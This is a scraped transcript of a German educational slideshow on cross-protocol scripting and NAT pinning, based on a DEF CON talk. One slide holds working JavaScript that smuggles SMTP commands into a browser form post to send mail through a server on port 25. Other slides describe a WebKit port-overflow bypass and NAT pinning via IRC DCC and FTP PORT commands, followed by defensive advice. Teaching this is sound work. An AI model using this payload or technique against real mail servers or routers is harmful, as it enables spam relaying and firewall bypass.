Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.

Veröffentlicht von:Hartwin Dresch Geändert vor über 10 Jahren

Ähnliche Präsentationen

Präsentation zum Thema: "IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein."—  Präsentation transkript:

1 IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein

2 Motivation Defcon 18 Videos auf Youtube How i met your Girlfriend Von Samy Kamkar http://www.youtube.com/watch?v=fEmO7wQKCMw Inhalt: PHP 160 Bit Session Variable Reduktion auf 40 Bit Cross Protocol Scripitng (XPS) NAT Pinning Webkit Integer overflow Geolocation via XXXSS

3 Cross Protocol Scripting (XPS) HTTP Newline Protocol Browser ist HTTP Client \n Client HTTP Server auf Port 80, 443,8080, ???? Andere Newline Protokolle SMTP FTP IRC

4 Der Browser als beliebiger Client SMTP Zum versenden von Spam IRC Zum versenden von Spam -> NAT Pinning FTP -> NAT Pinning

5 Der Javascript Client doc = document.createElement(form); doc.setAttribute(name,x); doc.setAttribute(method,POST); //GET Funktioniert natürlich nicht doc.setAttribute(action,http://mail.fhstp.ac.at:25/); //Server+Port doc.setAttribute(enctype,multipart/form-data); //erhält newlines! payload = document.createElement(textarea); payload.setAttribute(name, C); // Der eigentliche Inhalt data = HELO\nMAIL FROM: \nRCPT TO: \nDATA\nSubject: Raketenfuzzys\nKeep up the good work!\n.\n\nQUIT;serious@business.orgastnwt@fhstp.ac.at payload.setAttribute(value, data); payload.innerHTML = data; payload.innerText = data; doc.appendChild(palyoad); document.body.appendChild(doc); doc.submit(); //Abschicken

6 Demo

7 Webkit Integer Overflow IRC Port 6667 6667 = 0001 1010 0000 1011 72203 = 1 0001 1010 0000 1011 Browser check: If port != 6667 then connect(hostname, port) TCP/UDP Port nur 16 Bit groß 17. Bit wird einfach abgeschnitten!

8 NAT Pinning SOHO Router und Firewalls sind ALGs Inspizieren und Interpretieren Layer 7 Payload Beispiele: IRC/DCC: PRIVMSG target :DCC target $IP $PORT Netfilter IRC Conntrack FTP PORT Command PORT ip1.ip2.ip3.ip4.p1.p2 ? Implementationsabhängig!

9 Was lernen wir daraus Browser: Aktuellen Browser verwenden (patchen, auch Browser!) NoScript? Firewall: Regeln überdenken Brauche/habe ich ALG Funktionalität aktiviert? Host based Firewalls

10 Vielen Dank für Ihre Aufmerksamkeit!

Herunterladen ppt "IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein."

Ähnliche Präsentationen

Dynamische WEB-Applikationen

Dynamische WEB-Applikationen
E-Solutions mySchoeller.com for Felix Schoeller Imaging

E-Solutions mySchoeller.com for Felix Schoeller Imaging
Dominic Ziegler 12c Webprogrammierung.

Dominic Ziegler 12c Webprogrammierung.
Überwachung des Nagios-Servers

Überwachung des Nagios-Servers
für das Schulnetz der BS Roth

für das Schulnetz der BS Roth
Inhalt – Technische Grundlagen

Inhalt – Technische Grundlagen
© 2003 Guido Badertscher Spontane Vernetzung - UPnP 9. Jänner 2004 Spontane Vernetzung Guido Badertscher.

© 2003 Guido Badertscher Spontane Vernetzung - UPnP 9. Jänner 2004 Spontane Vernetzung Guido Badertscher.
Die Firewall Was versteht man unter dem Begriff „Firewall“?

Die Firewall Was versteht man unter dem Begriff „Firewall“?
Internet Protokolle und Formate 1.1 HTTP 1.2 HTML 1.3 SGML 2. XML 3. WAP Matthias Thränhardt Sebastian Weber.

Internet Protokolle und Formate 1.1 HTTP 1.2 HTML 1.3 SGML 2. XML 3. WAP Matthias Thränhardt Sebastian Weber.
ATHOS Benutzertreffen 2007

ATHOS Benutzertreffen 2007
Dynamische Webseiten Java servlets.

Dynamische Webseiten Java servlets.
Gesellschaft für wissenschaftliche Datenverarbeitung mbH Göttingen Am Fassberg, 37077 Göttingen Fon: 0551 201-1510 Fax: 0551 21119

Gesellschaft für wissenschaftliche Datenverarbeitung mbH Göttingen Am Fassberg, Göttingen Fon: Fax:
Architektur von Renardus Göttingen State and University Library, Germany (SUB) Frank Klaproth The Academic Subject.

Architektur von Renardus Göttingen State and University Library, Germany (SUB) Frank Klaproth The Academic Subject.
Internet und seine Dienste

Internet und seine Dienste
Anforderungen an globales und privates IP-Networking Berlin - 27

Anforderungen an globales und privates IP-Networking Berlin - 27
Multimedia - Datenformate

Multimedia - Datenformate
1. Einführung Lernziele: Auffrischen des Wissens aus Rechnernetze

1. Einführung Lernziele: Auffrischen des Wissens aus Rechnernetze
Martin MauveUniversität Mannheim1 3.6 User Datagram Protocol (UDP) RFC 768. J. Postel. User Datagram Protocol. 1980. unzuverlässiges Transportprotokoll.

Martin MauveUniversität Mannheim1 3.6 User Datagram Protocol (UDP) RFC 768. J. Postel. User Datagram Protocol unzuverlässiges Transportprotokoll.
Grundlagen der CGI-Programmierung Martin Vorländer PDV-SYSTEME GmbH Bornhardtstraße 3 38644 Goslar.

Grundlagen der CGI-Programmierung Martin Vorländer PDV-SYSTEME GmbH Bornhardtstraße Goslar.
CTS2 based Terminology Server – Overview – Project eBPG

CTS2 based Terminology Server – Overview – Project eBPG

Ähnliche Präsentationen

Google-Anzeigen